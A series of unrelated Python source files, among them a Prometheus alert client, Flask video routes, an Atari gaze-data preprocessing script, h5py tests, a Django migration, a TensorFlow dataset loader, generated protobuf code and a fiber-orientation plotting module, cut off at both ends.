Returns: List of alerts """ url = f"{self.base_url}/api/v1/alerts" async with aiohttp.ClientSession() as session: async with session.get(url) as response: result = await response.json() # response looks like this: # # { # "status": "success", # "data": { # "alerts": [ # { # "labels": { # "alertname": "AlwaysFiring", # "job": "non_existing_job", # "juju_application": "avalanche-k8s", # "juju_charm": "avalanche-k8s", # "juju_model": "remotewrite", # "juju_model_uuid": "5d2582f6-f8c9-4496-835b-675431d1fafe", # "severity": "High" # }, # "annotations": { # "description": " of job non_existing_job is firing the dummy alarm.", # "summary": "Instance dummy alarm (always firing)" # }, # "state": "firing", # "activeAt": "2022-01-13T18:53:12.808550042Z", # "value": "1e+00" # } # ] # } # } return result["data"]["alerts"] if result["status"] == "success" else [] async def run_promql(self, query: str, disable_ssl: bool = True) -> list: prometheus = PrometheusConnect(url=self.base_url, disable_ssl=disable_ssl) return prometheus.custom_query(query=query)
import FWCore.ParameterSet.Config as cms from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer SiStripBaselineValidator = DQMEDAnalyzer('SiStripBaselineValidator', srcProcessedRawDigi = cms.InputTag('siStripZeroSuppression','VirginRaw') )
from flask import request, Blueprint, render_template, redirect from services.user import UserServices from services.video import VideoServices video = Blueprint('video', __name__) @video.route('/play') def video_play(): uid = request.cookies.get('uid') if uid is None: return redirect('/user/login', 302) video_id = request.args.get('video_id') us = UserServices() vd = VideoServices() u_result = us.get_user_info(uid) total_time = us.get_user_time(uid) vd = vd.get_video_info(video_id) return render_template('video/play.html', username=u_result['user_name'], total_time=round(total_time / 60, 1), vd=vd) @video.route('/list') def video_list(): uid = request.cookies.get('uid') if uid is None: return redirect('/user/login', 302) subject_id = request.args.get('sub') us = UserServices() u_result = us.get_user_info(uid) total_time = us.get_user_time(uid) vd = VideoServices() v_result = vd.get_video_list(subject_id) return render_template('video/list.html', course=v_result, username=u_result['user_name'], total_time=round(total_time / 60, 1)) @video.route('live') def video_live(): uid = request.cookies.get('uid') live = request.args.get("live") if uid is None: return redirect('/user/login', 302) return render_template("video/live.html", live=live, grade=str(int(request.args.get("live"))))
import sys import pandas as pd import os from yaml import safe_load import csv from collections import OrderedDict import cv2 import numpy as np from tqdm import tqdm from subprocess import call import h5py from src.data.data_loaders import load_action_data, load_gaze_data from src.features.feat_utils import transform_images, fuse_gazes_noop sys.path.append(os.path.dirname(os.path.abspath(__file__))) # pylint: disable=all from data_utils import get_game_entries_, process_gaze_data # nopep8 with open('src/config.yaml', 'r') as f: config_data = safe_load(f.read()) RAW_DATA_DIR = config_data['RAW_DATA_DIR'] PROC_DATA_DIR = config_data['PROC_DATA_DIR'] INTERIM_DATA_DIR = config_data['INTERIM_DATA_DIR'] VALID_ACTIONS = config_data['VALID_ACTIONS'] STACK_SIZE = config_data['STACK_SIZE'] CMP_FMT = config_data['CMP_FMT'] OVERWRITE_INTERIM_GAZE = config_data['OVERWRITE_INTERIM_GAZE'] with open(os.path.join(RAW_DATA_DIR, 'action_enums.txt'), 'r') as f: ACTIONS_ENUM = f.read() games = VALID_ACTIONS.keys() def create_interim_files(game='breakout'): valid_actions = VALID_ACTIONS[game] game_runs, game_runs_dirs, game_runs_gazes = get_game_entries_( os.path.join(RAW_DATA_DIR, game)) interim_game_dir = os.path.join(INTERIM_DATA_DIR, game) if not os.path.exists(interim_game_dir): os.makedirs(interim_game_dir) for game_run, game_run_dir, game_run_gaze in tqdm( zip(game_runs, game_runs_dirs, game_runs_gazes)): untar_sting = 'tar -xjf {} -C {}'.format( os.path.join(game_run_dir, game_run) + CMP_FMT, interim_game_dir + '/') untar_args = untar_sting.split(' ') interim_writ_dir = os.path.join(interim_game_dir, game_run) gaze_out_file = '{}/{}_gaze_data.csv'.format(interim_writ_dir, game_run) if os.path.exists(os.path.join(interim_game_dir, game_run)): print("Exists, Skipping {}/{}".format(game_run_dir, game_run)) else: print("Extracting {}/{}".format(game_run_dir, game_run)) call(untar_args) if not os.path.exists(gaze_out_file) or OVERWRITE_INTERIM_GAZE: print("Prepping gaze data for {}/{}".format( game_run_dir, game_run)) gaze_file = os.path.join(game_run_dir, game_run_gaze) process_gaze_data(gaze_file, gaze_out_file, valid_actions) else: print("Exists, Skipping prepping of {}/{}".format( game_run_dir, game_run)) def create_processed_data(stack=1, stack_type='', stacking_skip=0, from_ix=0, till_ix=-1, game='breakout'): game_dir = os.path.join(INTERIM_DATA_DIR, game) game_runs = os.listdir(game_dir) images = [] actions = [] gaze_out_h5_file = os.path.join(PROC_DATA_DIR, game + '.hdf5') gaze_h5_file = h5py.File(gaze_out_h5_file, 'w') for game_run in tqdm(game_runs): print("Creating processed data for ", game, game_run) images_, actions_ = load_action_data(stack, stack_type, stacking_skip, from_ix, till_ix, game, game_run) _, gazes = load_gaze_data(stack, stack_type, stacking_skip, from_ix, till_ix, game, game_run, skip_images=True) images_ = transform_images(images_, type='torch') gazes = fuse_gazes_noop(images_, gazes, actions_, gaze_count=1, fuse_type='stack', fuse_val=1) images_ = images_.numpy() gazes = gazes.numpy() group = gaze_h5_file.create_group(game_run) group.create_dataset('images', data=images_, compression="gzip") group.create_dataset('actions', data=actions_, compression="gzip") group.create_dataset('fused_gazes', data=gazes, compression="gzip") del gazes, images_, actions_ gaze_h5_file.close() def combine_processed_data(game): gaze_out_h5_file = os.path.join(PROC_DATA_DIR, game + '.hdf5') gaze_h5_file = h5py.File(gaze_out_h5_file, 'a') groups = list(gaze_h5_file.keys()) if not 'combined' in groups: all_group = gaze_h5_file.create_group('combined') all_group = gaze_h5_file['combined'] data = list(gaze_h5_file[groups[0]].keys()) for datum in tqdm(data): max_shape_datum = (sum([ gaze_h5_file[group][datum].shape[0] for group in groups if group != 'combined' ]), *gaze_h5_file[groups[0]][datum].shape[1:]) print(max_shape_datum, datum) all_group.create_dataset(datum, data=gaze_h5_file[groups[0]][datum][:], maxshape=max_shape_datum) for group in tqdm(groups[1:]): gaze_h5_file['combined'][datum].resize( gaze_h5_file['combined'][datum].shape[0] + gaze_h5_file[group][datum].shape[0], axis=0) gaze_h5_file['combined'][datum][ gaze_h5_file['combined'][datum]. shape[0]:, :] = gaze_h5_file[group][datum] gaze_h5_file.close() if __name__ == "__main__": for game in games: create_interim_files(game=game) create_processed_data(stack=STACK_SIZE, game=game, till_ix=10) combine_processed_data(game)
from __future__ import with_statement """ Test highlevel Group object behavior """ import numpy as np import h5py from common import TestCasePlus, api_16, api_18, res from common import dump_warnings SHAPES = [(), (1,), (10,5), (1,10), (10,1), (100,1,100), (51,2,1025)] class GroupBase(TestCasePlus): """ Base class to handle Group setup/teardown, and some shared logic. """ def setUp(self): self.f = h5py.File(res.get_name(), 'w') def tearDown(self): res.clear() def assert_equal_contents(self, a, b): """ Check if two iterables contain the same elements, regardless of order. """ self.assertEqual(set(a), set(b)) self.assertEqual(len(a), len(b)) ## ----- from h5py import Group, Dataset, Datatype, File import numpy class TestOther(GroupBase): def test_require(self): grp = self.f.require_group('foo') self.assert_(isinstance(grp, Group)) self.assert_('foo' in self.f) grp2 = self.f.require_group('foo') self.assert_(grp == grp2) self.assert_(hash(grp) == hash(grp2)) dset = self.f.require_dataset('bar', (10,10), '<i4') self.assert_(isinstance(dset, Dataset)) self.assert_('bar' in self.f) dset2 = self.f.require_dataset('bar', (10,10), '<i4') self.assert_(dset == dset2) self.assert_(hash(dset) == hash(dset2)) self.assertRaises(TypeError, self.f.require_group, 'bar') self.assertRaises(TypeError, self.f.require_dataset, 'foo', (10,10), '<i4') self.assertRaises(TypeError, self.f.require_dataset, 'bar', (10,11), '<i4') self.assertRaises(TypeError, self.f.require_dataset, 'bar', (10,10), '<c8') self.assertRaises(TypeError, self.f.require_dataset, 'bar', (10,10), '<i1', exact=True) self.f.require_dataset('bar', (10,10), '<i1') @api_16 def test_copy_16(self): self.f.create_group('foo') self.assertRaises(NotImplementedError, self.f.copy, 'foo', 'bar') @api_18 def test_copy_18(self): self.f.create_group('foo') self.f.create_group('foo/bar') self.f.copy('foo', 'new') self.assert_('new' in self.f) self.assert_('new/bar' in self.f)
#!/usr/bin/env python3 from librip.gens import gen_random from librip.iterators import Unique data1 = [1, 1, 1, 1, 1, 2, 2, 2, 2, 2] data2 = ['A', 'a', 'b', 'B'] data3 = ['A', 'a', 'b', 'B'] # Реализация задания 2 for i in Unique(data1): print(i, end=" ") print(" ") for i in Unique(data2): print(i, end=" ") print(" ") for i in Unique(data3, ignore_case=True): print(i, end=" ") print(" ")
# Generated by Django 2.2.1 on 2019-08-28 09:17 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Student', fields=[ ('id', models.AutoField(primary_key=True, serialize=False)), ('user_name', models.CharField(max_length=50)), ('first_name', models.CharField(max_length=50)), ('last_name', models.CharField(max_length=50)), ('email', models.EmailField(blank=True, max_length=70)), ('advisor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), ]
import typing import tensorflow as tf FEATURES = [ "fixed_acidity", "volatile_acidity", "citric_acid", "residual_sugar", "chlorides", "free_sulfur_dioxide", "total_sulfur_dioxide", "density", "pH", "sulphates", "alcohol" ] LABEL = "quality" def get_train_eval_datasets( path: str, train_fraction: float = 0.7 ) -> typing.Tuple[tf.data.Dataset, tf.data.Dataset]: def split_label(*row): return dict(zip(FEATURES, row)), row[-1] def in_training_set(*row): num_buckets = 1000 key = tf.string_join(list(map(tf.as_string, row))) bucket_id = tf.string_to_hash_bucket_fast(key, num_buckets) return bucket_id < int(train_fraction * num_buckets) def in_test_set(*row): return ~in_training_set(*row) data = tf.contrib.data.CsvDataset( path, [tf.float32] * len(FEATURES) + [tf.int32], header=True, field_delim=";") train = data.filter(in_training_set).map(split_label).cache() test = data.filter(in_test_set).map(split_label).cache() return train, test def get_feature_columns(): return [tf.feature_column.numeric_column(name) for name in FEATURES] def get_n_classes(): return 10
# Generated by the protocol buffer compiler. DO NOT EDIT! # source: karps/proto/computation.proto import sys _b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1')) from google.protobuf.internal import enum_type_wrapper from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database from google.protobuf import descriptor_pb2 # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() from karps.proto import graph_pb2 as karps_dot_proto_dot_graph__pb2 from karps.proto import row_pb2 as karps_dot_proto_dot_row__pb2 from tensorflow.core.framework import node_def_pb2 as tensorflow_dot_core_dot_framework_dot_node__def__pb2 DESCRIPTOR = _descriptor.FileDescriptor( name='karps/proto/computation.proto', package='karps.core', syntax='proto3', serialized_pb=_b('\n\x1dkarps/proto/computation.proto\x12\nkarps.core\x1a\x17karps/proto/graph.proto\x1a\x15karps/proto/row.proto\x1a(tensorflow/core/framework/node_def.proto\"\xfd\x01\n\x11\x43omputationResult\x12$\n\nlocal_path\x18\x01 \x01(\x0b\x32\x10.karps.core.Path\x12(\n\x06status\x18\x02 \x01(\x0e\x32\x18.karps.core.ResultStatus\x12\x13\n\x0b\x66inal_error\x18\x03 \x01(\t\x12.\n\x0c\x66inal_result\x18\x04 \x01(\x0b\x32\x18.karps.core.CellWithType\x12+\n\x0bspark_stats\x18\x05 \x01(\x0b\x32\x16.karps.core.SparkStats\x12&\n\x0c\x64\x65pendencies\x18\x06 \x03(\x0b\x32\x10.karps.core.Path\"o\n\x16\x42\x61tchComputationResult\x12%\n\x0btarget_path\x18\x01 \x01(\x0b\x32\x10.karps.core.Path\x12.\n\x07results\x18\x02 \x03(\x0b\x32\x1d.karps.core.ComputationResult\"c\n\x0bPointerPath\x12.\n\x0b\x63omputation\x18\x01 \x01(\x0b\x32\x19.karps.core.ComputationId\x12$\n\nlocal_path\x18\x02 \x01(\x0b\x32\x10.karps.core.Path\"\xde\x01\n\nSparkStats\x12%\n\x08rdd_info\x18\x01 \x03(\x0b\x32\x13.karps.core.RDDInfo\x12\'\n\x06parsed\x18\x02 \x03(\x0b\x32\x17.karps.core.SQLTreeInfo\x12)\n\x08\x61nalyzed\x18\x03 \x03(\x0b\x32\x17.karps.core.SQLTreeInfo\x12*\n\toptimized\x18\x04 \x03(\x0b\x32\x17.karps.core.SQLTreeInfo\x12)\n\x08physical\x18\x05 \x03(\x0b\x32\x17.karps.core.SQLTreeInfo\"p\n\x07RDDInfo\x12\x0e\n\x06rdd_id\x18\x01 \x01(\x03\x12\x12\n\nclass_name\x18\x02 \x01(\t\x12\x0c\n\x04repr\x18\x03 \x01(\t\x12\x0f\n\x07parents\x18\x04 \x03(\x03\x12\"\n\x05proto\x18\x05 \x01(\x0b\x32\x13.tensorflow.NodeDef\"k\n\x0bSQLTreeInfo\x12\x0f\n\x07node_id\x18\x01 \x01(\t\x12\x11\n\tfull_name\x18\x02 \x01(\t\x12\x14\n\x0cparent_nodes\x18\x03 \x03(\t\x12\"\n\x05proto\x18\x04 \x01(\x0b\x32\x13.tensorflow.NodeDef\"\x1b\n\rComputationId\x12\n\n\x02id\x18\x01 \x01(\t\"\x17\n\tSessionId\x12\n\n\x02id\x18\x01 \x01(\t*b\n\x0cResultStatus\x12\n\n\x06UNUSED\x10\x00\x12\x0b\n\x07RUNNING\x10\x01\x12\x14\n\x10\x46INISHED_SUCCESS\x10\x02\x12\x14\n\x10\x46INISHED_FAILURE\x10\x03\x12\r\n\tSCHEDULED\x10\x04\x62\x06proto3') , dependencies=[karps_dot_proto_dot_graph__pb2.DESCRIPTOR,karps_dot_proto_dot_row__pb2.DESCRIPTOR,tensorflow_dot_core_dot_framework_dot_node__def__pb2.DESCRIPTOR,]) _RESULTSTATUS = _descriptor.EnumDescriptor( name='ResultStatus', full_name='karps.core.ResultStatus', filename=None, file=DESCRIPTOR, values=[ _descriptor.EnumValueDescriptor( name='UNUSED', index=0, number=0, options=None, type=None), _descriptor.EnumValueDescriptor( name='RUNNING', index=1, number=1, options=None, type=None), _descriptor.EnumValueDescriptor( name='FINISHED_SUCCESS', index=2, number=2, options=None, type=None), _descriptor.EnumValueDescriptor( name='FINISHED_FAILURE', index=3, number=3, options=None, type=None), _descriptor.EnumValueDescriptor( name='SCHEDULED', index=4, number=4, options=None, type=None), ], containing_type=None, options=None, serialized_start=1107, serialized_end=1205, ) _sym_db.RegisterEnumDescriptor(_RESULTSTATUS) ResultStatus = enum_type_wrapper.EnumTypeWrapper(_RESULTSTATUS) UNUSED = 0 RUNNING = 1 FINISHED_SUCCESS = 2 FINISHED_FAILURE = 3 SCHEDULED = 4 _COMPUTATIONRESULT = _descriptor.Descriptor( name='ComputationResult', full_name='karps.core.ComputationResult', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='local_path', full_name='karps.core.ComputationResult.local_path', index=0, number=1, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='status', full_name='karps.core.ComputationResult.status', index=1, number=2, type=14, cpp_type=8, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='final_error', full_name='karps.core.ComputationResult.final_error', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='final_result', full_name='karps.core.ComputationResult.final_result', index=3, number=4, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='spark_stats', full_name='karps.core.ComputationResult.spark_stats', index=4, number=5, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='dependencies', full_name='karps.core.ComputationResult.dependencies', index=5, number=6, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=136, serialized_end=389, ) _BATCHCOMPUTATIONRESULT = _descriptor.Descriptor( name='BatchComputationResult', full_name='karps.core.BatchComputationResult', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='target_path', full_name='karps.core.BatchComputationResult.target_path', index=0, number=1, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='results', full_name='karps.core.BatchComputationResult.results', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=391, serialized_end=502, ) _POINTERPATH = _descriptor.Descriptor( name='PointerPath', full_name='karps.core.PointerPath', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='computation', full_name='karps.core.PointerPath.computation', index=0, number=1, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='local_path', full_name='karps.core.PointerPath.local_path', index=1, number=2, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=504, serialized_end=603, ) _SPARKSTATS = _descriptor.Descriptor( name='SparkStats', full_name='karps.core.SparkStats', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='rdd_info', full_name='karps.core.SparkStats.rdd_info', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='parsed', full_name='karps.core.SparkStats.parsed', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='analyzed', full_name='karps.core.SparkStats.analyzed', index=2, number=3, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='optimized', full_name='karps.core.SparkStats.optimized', index=3, number=4, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='physical', full_name='karps.core.SparkStats.physical', index=4, number=5, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=606, serialized_end=828, ) _RDDINFO = _descriptor.Descriptor( name='RDDInfo', full_name='karps.core.RDDInfo', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='rdd_id', full_name='karps.core.RDDInfo.rdd_id', index=0, number=1, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='class_name', full_name='karps.core.RDDInfo.class_name', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='repr', full_name='karps.core.RDDInfo.repr', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='parents', full_name='karps.core.RDDInfo.parents', index=3, number=4, type=3, cpp_type=2, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='proto', full_name='karps.core.RDDInfo.proto', index=4, number=5, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=830, serialized_end=942, ) _SQLTREEINFO = _descriptor.Descriptor( name='SQLTreeInfo', full_name='karps.core.SQLTreeInfo', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='node_id', full_name='karps.core.SQLTreeInfo.node_id', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='full_name', full_name='karps.core.SQLTreeInfo.full_name', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='parent_nodes', full_name='karps.core.SQLTreeInfo.parent_nodes', index=2, number=3, type=9, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='proto', full_name='karps.core.SQLTreeInfo.proto', index=3, number=4, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=944, serialized_end=1051, ) _COMPUTATIONID = _descriptor.Descriptor( name='ComputationId', full_name='karps.core.ComputationId', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='id', full_name='karps.core.ComputationId.id', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=1053, serialized_end=1080, ) _SESSIONID = _descriptor.Descriptor( name='SessionId', full_name='karps.core.SessionId', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='id', full_name='karps.core.SessionId.id', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=1082, serialized_end=1105, ) _COMPUTATIONRESULT.fields_by_name['local_path'].message_type = karps_dot_proto_dot_graph__pb2._PATH _COMPUTATIONRESULT.fields_by_name['status'].enum_type = _RESULTSTATUS _COMPUTATIONRESULT.fields_by_name['final_result'].message_type = karps_dot_proto_dot_row__pb2._CELLWITHTYPE _COMPUTATIONRESULT.fields_by_name['spark_stats'].message_type = _SPARKSTATS _COMPUTATIONRESULT.fields_by_name['dependencies'].message_type = karps_dot_proto_dot_graph__pb2._PATH _BATCHCOMPUTATIONRESULT.fields_by_name['target_path'].message_type = karps_dot_proto_dot_graph__pb2._PATH _BATCHCOMPUTATIONRESULT.fields_by_name['results'].message_type = _COMPUTATIONRESULT _POINTERPATH.fields_by_name['computation'].message_type = _COMPUTATIONID _POINTERPATH.fields_by_name['local_path'].message_type = karps_dot_proto_dot_graph__pb2._PATH _SPARKSTATS.fields_by_name['rdd_info'].message_type = _RDDINFO _SPARKSTATS.fields_by_name['parsed'].message_type = _SQLTREEINFO _SPARKSTATS.fields_by_name['analyzed'].message_type = _SQLTREEINFO _SPARKSTATS.fields_by_name['optimized'].message_type = _SQLTREEINFO _SPARKSTATS.fields_by_name['physical'].message_type = _SQLTREEINFO _RDDINFO.fields_by_name['proto'].message_type = tensorflow_dot_core_dot_framework_dot_node__def__pb2._NODEDEF _SQLTREEINFO.fields_by_name['proto'].message_type = tensorflow_dot_core_dot_framework_dot_node__def__pb2._NODEDEF DESCRIPTOR.message_types_by_name['ComputationResult'] = _COMPUTATIONRESULT DESCRIPTOR.message_types_by_name['BatchComputationResult'] = _BATCHCOMPUTATIONRESULT DESCRIPTOR.message_types_by_name['PointerPath'] = _POINTERPATH DESCRIPTOR.message_types_by_name['SparkStats'] = _SPARKSTATS DESCRIPTOR.message_types_by_name['RDDInfo'] = _RDDINFO DESCRIPTOR.message_types_by_name['SQLTreeInfo'] = _SQLTREEINFO DESCRIPTOR.message_types_by_name['ComputationId'] = _COMPUTATIONID DESCRIPTOR.message_types_by_name['SessionId'] = _SESSIONID DESCRIPTOR.enum_types_by_name['ResultStatus'] = _RESULTSTATUS _sym_db.RegisterFileDescriptor(DESCRIPTOR) ComputationResult = _reflection.GeneratedProtocolMessageType('ComputationResult', (_message.Message,), dict( DESCRIPTOR = _COMPUTATIONRESULT, __module__ = 'karps.proto.computation_pb2' # @@protoc_insertion_point(class_scope:karps.core.ComputationResult) )) _sym_db.RegisterMessage(ComputationResult) BatchComputationResult = _reflection.GeneratedProtocolMessageType('BatchComputationResult', (_message.Message,), dict( DESCRIPTOR = _BATCHCOMPUTATIONRESULT, __module__ = 'karps.proto.computation_pb2' # @@protoc_insertion_point(class_scope:karps.core.BatchComputationResult) )) _sym_db.RegisterMessage(BatchComputationResult) PointerPath = _reflection.GeneratedProtocolMessageType('PointerPath', (_message.Message,), dict( DESCRIPTOR = _POINTERPATH, __module__ = 'karps.proto.computation_pb2' # @@protoc_insertion_point(class_scope:karps.core.PointerPath) )) _sym_db.RegisterMessage(PointerPath) SparkStats = _reflection.GeneratedProtocolMessageType('SparkStats', (_message.Message,), dict( DESCRIPTOR = _SPARKSTATS, __module__ = 'karps.proto.computation_pb2' # @@protoc_insertion_point(class_scope:karps.core.SparkStats) )) _sym_db.RegisterMessage(SparkStats) RDDInfo = _reflection.GeneratedProtocolMessageType('RDDInfo', (_message.Message,), dict( DESCRIPTOR = _RDDINFO, __module__ = 'karps.proto.computation_pb2' # @@protoc_insertion_point(class_scope:karps.core.RDDInfo) )) _sym_db.RegisterMessage(RDDInfo) SQLTreeInfo = _reflection.GeneratedProtocolMessageType('SQLTreeInfo', (_message.Message,), dict( DESCRIPTOR = _SQLTREEINFO, __module__ = 'karps.proto.computation_pb2' # @@protoc_insertion_point(class_scope:karps.core.SQLTreeInfo) )) _sym_db.RegisterMessage(SQLTreeInfo) ComputationId = _reflection.GeneratedProtocolMessageType('ComputationId', (_message.Message,), dict( DESCRIPTOR = _COMPUTATIONID, __module__ = 'karps.proto.computation_pb2' # @@protoc_insertion_point(class_scope:karps.core.ComputationId) )) _sym_db.RegisterMessage(ComputationId) SessionId = _reflection.GeneratedProtocolMessageType('SessionId', (_message.Message,), dict( DESCRIPTOR = _SESSIONID, __module__ = 'karps.proto.computation_pb2' # @@protoc_insertion_point(class_scope:karps.core.SessionId) )) _sym_db.RegisterMessage(SessionId) try: # THESE ELEMENTS WILL BE DEPRECATED. # Please use the generated *_pb2_grpc.py files instead. import grpc from grpc.beta import implementations as beta_implementations from grpc.beta import interfaces as beta_interfaces from grpc.framework.common import cardinality from grpc.framework.interfaces.face import utilities as face_utilities except ImportError: pass # @@protoc_insertion_point(module_scope)
import os import math import numpy as np import matplotlib as mpl import matplotlib.pyplot as plt import matplotlib.ticker as ticker import matplotlib.colors as colors import mpl_toolkits.axisartist.floating_axes as floating_axes from skimage import io from matplotlib import cm from skimage import filters from skimage import morphology from quanfima.utils import geo2rgb from quanfima import visvis_available from matplotlib.transforms import Affine2D from matplotlib.projections import PolarAxes from scipy import ndimage as ndi, interpolate from mpl_toolkits.axes_grid1 import make_axes_locatable from mpl_toolkits.axisartist.grid_finder import DictFormatter, FixedLocator from mpl_toolkits.axisartist.floating_axes import GridHelperCurveLinear if visvis_available: import visvis as vv def plot_orientation_map(orient_map, fiber_skel, radius_structure_elem=1, figsize=(12, 12), cmap='hsv', dpi=200, min_label='0', max_label='180', name=None, output_dir=None): """Plots the orientation map with the color wheel. Plots the orientation map from the provided angles `orient_map` and skeleton `fiber_skel` of size `figsize` using the colormap `cmap` and writes as a png file with DPI of `dpi` to the folder specified by `output_dir`. Parameters ---------- orient_map : ndarray 2D array of orientation at every point of the skeleton. fiber_skel : ndarray The binary skeleton extracted from the binary data. radius_structure_elem : integer Indicates the size of the structure element of the dilation process to thicken the skeleton. figsize : tuple of integers Indicates the size of the output figure. cmap : str Indicates the name of a colormap used to map angles to colors. dpi : integer Indicates the DPI of the output image. min_label : str Indicates the label of minimum degree. max_label : str Indicates the label of minimum degree. name : str Indicates the name of the output png file. output_dir : str Indicates the path to the output folder where the image will be stored. """ disk = morphology.disk(radius_structure_elem) orient_map = ndi.grey_dilation(orient_map, structure=disk).astype(np.float32) fiber_skel = ndi.binary_dilation(fiber_skel, structure=disk).astype(np.float32) fig = plt.figure(figsize=figsize) masked_orient_map = np.ma.masked_where(fiber_skel == 